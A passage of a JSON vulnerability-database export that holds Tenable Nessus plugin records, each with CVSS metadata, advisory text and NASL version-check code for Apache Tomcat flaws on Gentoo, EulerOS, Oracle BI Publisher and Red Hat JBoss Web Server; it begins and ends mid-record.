"cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221", "CVE-2019-12418", "CVE-2019-17563", "CVE-2020-1938"], "modified": "2023-01-10T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:tomcat", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202003-43.NASL", "href": "https://www.tenable.com/plugins/nessus/134729", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202003-43.\n#\n# The advisory text is Copyright (C) 2001-2023 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134729);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/10\");\n\n script_cve_id(\"CVE-2019-0221\", \"CVE-2019-12418\", \"CVE-2019-17563\", \"CVE-2020-1938\");\n script_xref(name:\"GLSA\", value:\"202003-43\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0021\");\n\n script_name(english:\"GLSA-202003-43 : Apache Tomcat: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202003-43\n(Apache Tomcat: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Apache Tomcat. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n An attacker could possibly smuggle HTTP requests or execute arbitrary\n code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202003-43\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Apache Tomcat 7.x users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/tomcat-7.0.100:7'\n All Apache Tomcat 8.5.x users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/tomcat-8.5.51:8.5'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1938\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/tomcat\", unaffected:make_list(\"ge 8.5.51\", \"ge 7.0.100\"), vulnerable:make_list(\"lt 8.5.51\", \"lt 7.0.100\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache Tomcat\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-05T15:22:50", "description": "According to the versions of the tomcat packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - The URL pattern of '' (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected.\n Only security constraints with a URL pattern of the empty string were affected.(CVE-2018-1304)\n\n - Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded\n - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.(CVE-2018-1305)\n\n - The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.(CVE-2019-0221)\n\n - The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88.(CVE-2018-8034)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-12-10T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : tomcat (EulerOS-SA-2019-2361)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1304", "CVE-2018-1305", "CVE-2018-8034", "CVE-2019-0221"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:tomcat", "p-cpe:/a:huawei:euleros:tomcat-admin-webapps", "p-cpe:/a:huawei:euleros:tomcat-el-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-lib", "p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api", "p-cpe:/a:huawei:euleros:tomcat-webapps", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2361.NASL", "href": "https://www.tenable.com/plugins/nessus/131853", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131853);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2018-1304\",\n \"CVE-2018-1305\",\n \"CVE-2018-8034\",\n \"CVE-2019-0221\"\n );\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"EulerOS 2.0 SP2 : tomcat (EulerOS-SA-2019-2361)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the tomcat packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - The URL pattern of '' (the empty string) which exactly\n maps to the context root was not correctly handled in\n Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27,\n 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as\n part of a security constraint definition. This caused\n the constraint to be ignored. It was, therefore,\n possible for unauthorised users to gain access to web\n application resources that should have been protected.\n Only security constraints with a URL pattern of the\n empty string were affected.(CVE-2018-1304)\n\n - Security constraints defined by annotations of Servlets\n in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27,\n 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only\n applied once a Servlet had been loaded. Because\n security constraints defined in this way apply to the\n URL pattern and any URLs below that point, it was\n possible - depending on the order Servlets were loaded\n - for some security constraints not to be applied. This\n could have exposed resources to users who were not\n authorised to access them.(CVE-2018-1305)\n\n - The SSI printenv command in Apache Tomcat 9.0.0.M1 to\n 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes\n user provided data without escaping and is, therefore,\n vulnerable to XSS. SSI is disabled by default. The\n printenv command is intended for debugging and is\n unlikely to be present in a production\n website.(CVE-2019-0221)\n\n - The host name verification when using TLS with the\n WebSocket client was missing. It is now enabled by\n default. Versions Affected: Apache Tomcat 9.0.0.M1 to\n 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35\n to 7.0.88.(CVE-2018-8034)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2361\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7642dc45\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected tomcat packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"tomcat-7.0.76-8.h6\",\n \"tomcat-admin-webapps-7.0.76-8.h6\",\n \"tomcat-el-2.2-api-7.0.76-8.h6\",\n \"tomcat-jsp-2.2-api-7.0.76-8.h6\",\n \"tomcat-lib-7.0.76-8.h6\",\n \"tomcat-servlet-3.0-api-7.0.76-8.h6\",\n \"tomcat-webapps-7.0.76-8.h6\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:47:12", "description": "The version of Oracle Business Intelligence Publisher or Oracle Analytics Server 5.5 running on the remote host is 11.1.1.9.x prior to 11.1.1.9.210215, 12.2.1.3.x prior to 12.2.1.3.210405, 12.2.1.4.x prior to 12.2.1.4.210402, or 12.2.5.5.x (OAS 5.5) prior to 12.2.5.5.210331. It is, therefore, affected by multiple vulnerabilities as noted in the April 2021 Critical Patch Update advisory, including the following:\n\n - An unspecified vulnerability exists in the Analytics Server component of Oracle BI Enterprise Edition subcomponent Apache Spark. An unauthenticated, remote attacker can exploit this, via HTTP, to take over Oracle BI Enterprise Edition. (CVE-2020-9480)\n\n - A denial of service vulnerability exists in the BI Platform Security component of Oracle BI Enterprise Edition subcomponent OpenSSL. An unauthenticated, remote attacker can exploit this, via HTTPS, to hang or repeatedly crash the product. (CVE-2020-1971)\n\n - An unspecified vulnerability exists in the BI Platform Security component of Oracle BI Enterprise Edition subcomponent Apache Tomcat. An unauthenticated, remote attacker can exploit this, via HTTP, to result in unauthorized update, insert, or delete access to some of Oracle BI accessible data, as well as unauthorized read access to a subset of Oracle BI accessible data. (CVE-2019-0221)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-26T00:00:00", "type": "nessus", "title": "Oracle Business Intelligence Publisher Multiple Vulnerabilities (Apr 2021 CPU)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221", "CVE-2020-11022", "CVE-2020-1971", "CVE-2020-9480", "CVE-2021-2152", "CVE-2021-2191"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:business_intelligence_publisher"], "id": "ORACLE_BI_PUBLISHER_APR_2021_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/148980", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148980);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2019-0221\",\n \"CVE-2020-1971\",\n \"CVE-2020-9480\",\n \"CVE-2020-11022\",\n \"CVE-2021-2152\",\n \"CVE-2021-2191\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0196\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Oracle Business Intelligence Publisher Multiple Vulnerabilities (Apr 2021 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Business Intelligence Publisher or Oracle Analytics Server 5.5 running on the remote host is\n11.1.1.9.x prior to 11.1.1.9.210215, 12.2.1.3.x prior to 12.2.1.3.210405, 12.2.1.4.x prior to 12.2.1.4.210402, or\n12.2.5.5.x (OAS 5.5) prior to 12.2.5.5.210331. It is, therefore, affected by multiple vulnerabilities as noted in\nthe April 2021 Critical Patch Update advisory, including the following:\n\n - An unspecified vulnerability exists in the Analytics Server component of Oracle BI Enterprise Edition\n subcomponent Apache Spark. An unauthenticated, remote attacker can exploit this, via HTTP, to take over\n Oracle BI Enterprise Edition. (CVE-2020-9480)\n\n - A denial of service vulnerability exists in the BI Platform Security component of Oracle BI Enterprise\n Edition subcomponent OpenSSL. An unauthenticated, remote attacker can exploit this, via HTTPS, to hang or\n repeatedly crash the product. (CVE-2020-1971)\n\n - An unspecified vulnerability exists in the BI Platform Security component of Oracle BI Enterprise Edition\n subcomponent Apache Tomcat. An unauthenticated, remote attacker can exploit this, via HTTP, to result in\n unauthorized update, insert, or delete access to some of Oracle BI accessible data, as well as\n unauthorized read access to a subset of Oracle BI accessible data. (CVE-2019-0221)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuapr2021.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/a/tech/docs/cpuapr2021cvrf.xml\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2021 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9480\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:business_intelligence_publisher\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_bi_publisher_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Business Intelligence Publisher\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::get_app_info(app:'Oracle Business Intelligence Publisher');\n\nvar constraints = [\n {'min_version': '11.1.1.9', 'fixed_version': '11.1.1.9.210215', 'patch': '32508654', 'bundle': '32744336'},\n {'min_version': '12.2.1.3', 'fixed_version': '12.2.1.3.210405', 'patch': '32726874', 'bundle': '32726874'},\n {'min_version': '12.2.1.4', 'fixed_version': '12.2.1.4.210402', 'patch': '32718479', 'bundle': '32718479'},\n # Oracle Analytics Server 5.5\n {'min_version': '12.2.5.5', 'fixed_version': '12.2.5.5.210331', 'patch': '32709138', 'bundle': '32709138'}\n];\n\nvcf::oracle_bi_publisher::check_version_and_report(app_info: app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T15:09:37", "description": "Updated Red Hat JBoss Web Server 5.2.0 packages are now available for Red Hat Enterprise Linux 6, Red Hat Enterprise Linux 7, and Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 5.2 serves as a replacement for Red Hat JBoss Web Server 5.1, and includes bug fixes, enhancements, and component upgrades, which are documented in the Release Notes, linked to in the References.\n\nSecurity Fix(es) :\n\n* openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash) (CVE-2018-5407)\n\n* openssl: 0-byte record padding oracle (CVE-2019-1559)\n\n* tomcat: HTTP/2 connection window exhaustion on write, incomplete fix of CVE-2019-0199 (CVE-2019-10072)\n\n* tomcat: XSS in SSI printenv (CVE-2019-0221)\n\n* tomcat: Apache Tomcat HTTP/2 DoS (CVE-2019-0199)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-11-22T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 / 8 : JBoss Web Server (RHSA-2019:3929)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5407", "CVE-2019-0199", "CVE-2019-0221", "CVE-2019-0232", "CVE-2019-10072", "CVE-2019-1559"], "modified": "2023-02-22T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jws5-ecj", "p-cpe:/a:redhat:enterprise_linux:jws5-javapackages-tools", "p-cpe:/a:redhat:enterprise_linux:jws5-jboss-logging", "p-cpe:/a:redhat:enterprise_linux:jws5-mod_cluster", "p-cpe:/a:redhat:enterprise_linux:jws5-mod_cluster-tomcat", "p-cpe:/a:redhat:enterprise_linux:jws5-python-javapackages", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-admin-webapps", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-docs-webapp", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-el-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-javadoc", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-jsp-2.3-api", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-lib", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-native", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-native-debuginfo", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-selinux", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-servlet-4.0-api", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-vault", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-vault-javadoc", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-webapps", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:8"], "id": "REDHAT-RHSA-2019-3929.NASL", "href": "https://www.tenable.com/plugins/nessus/131214", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:3929. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131214);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/22\");\n\n script_cve_id(\n \"CVE-2018-5407\",\n \"CVE-2019-0199\",\n \"CVE-2019-0221\",\n \"CVE-2019-0232\",\n \"CVE-2019-1559\",\n \"CVE-2019-10072\"\n );\n script_xref(name:\"RHSA\", value:\"2019:3929\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"RHEL 6 / 7 / 8 : JBoss Web Server (RHSA-2019:3929)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more 